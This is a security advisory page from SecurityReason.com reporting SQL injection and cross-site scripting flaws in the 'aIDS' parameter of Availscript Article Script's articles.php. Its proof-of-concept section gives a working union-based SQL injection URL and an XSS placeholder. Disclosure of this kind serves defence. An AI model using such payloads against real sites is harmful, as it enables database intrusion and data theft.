SecurityReason.com - Our Reason is

Security

Register | Forget Password | Login
SecurityReason
WLB
Services
RSS
Corporate
Note

If you have found a vulnerability, please send to our SecurityAlert Database :
secalert()securityreason()com

Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com

Home arrow SecurityAlert Database

Arrow  Topic :

Availscript Article Script (articles.php) Multiple Vulnerabilities


Arrow  SecurityAlert : 4331
Arrow  CVE : CVE-2008-4371
Arrow  CVE : CVE-2008-4372
Arrow  CWE : CWE-89
Arrow  CWE : CWE-79
Arrow  SecurityRisk : High  Security Risk High  (About)
Arrow  Remote Exploit : Yes
Arrow  Local Exploit : No
Arrow  Victim interaction required : No
Arrow  Exploit Available : No
Arrow  Credit : sl4xUz
Arrow  Published : 02.10.2008

Arrow  Affected Software : availscript.com:availscript_article_script



Arrow  Advisory Content :  

###########################################################
#
# ___ __ __ __ __
# /\_ \ /\ \\ \ /\ \/\ \
# ____\//\ \ \ \ \\ \ __ _ __ _\ \ \ \ \ ____
# /',__\ \ \ \ \ \ \\ \_ /\ \/'\\ \/'\\ \ \ \ \/\_ ,`\
# /\__, `\ \_\ \_\ \__ ,__\\> <\\> <\\ \ \_\ \/_/ /_
# \/\____/ /\____\\/_/\_\_//\_/\_\\_/\_\ \ \_____\/\____\
# \/___/ \/____/ \/_/ \//\/_///\/_/ \/_____/\/____/
#
# security breakd0wn!
###########################################################
#
# Title: Availscript Article Script (articles.php) Multiple
Vulnerabilities
# Vendor: http://www.availscript.com/
# Vulnerable Version: N/A
# Fix: N/A
#
###########################################################
#
# c0ntact: sl4x.xuz[at]gmail[dot]com
# d0rk: "assh0le"
# stop lammo
#
###########################################################

######################
1. Information
######################
Article Script allows you to publish your own articles or from the
publishers or authors. Aministrator can go to admin page to edit, delete or
manage articles, authors and categories. and the member can post articles
as an author or just can read the articles.

######################
2. Vulnerabilities
######################
SQL Injection in "articles.php" in the "aIDS" parameter.
Cross Site Scripting in "articles.php" in the "aIDS" parameter.

######################
3. PoC
######################
http://localhost/path/articles.php?aIDS=-1+union+select+1,2,user()--
http://localhost/path/articles.php?aIDS=[XSS]

###########################################################



Arrow  References :

http://securityreason.com/expldownload/1/4634/1 (Exploit)
http://www.securityfocus.com/bid/31095
http://www.milw0rm.com/exploits/6409




Arrow  Feedback :

If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
Alert

libopie __readrec() off-by-one

Security Risk Medium- 2010-04-23

This advisory is related to new FreeBSD advisory FreeBSD-SA-10:05.opie.

Apache RSS Apache Alert

» Apache ActiveMQ 5.4.0
   source code disclosure
   vulnerability

» Apache ActiveMQ 5.3.0
   Persistent Cross-Site
   Scripting

» Apache CouchDB 0.10.1
   Timing Attack
   Vulnerability

» Apache 1.3.41 mod_proxy
   Integer overflow (code
   execution)

PHP RSS PHP Alert

» PHP 5.2.12/5.3.1
   session.save_path
   safe_mode and
   open_basedir bypass

» PHP 5.2.12/5.3.1 Multiple
   Vulnerabilities

» PHP 5.2.11 libgd multiple
   vulnerabilities

» PHP 5.2.11 tempnam()
   safe_mode bypass

Copyright © SecurityReason.com. All Rights Reserved.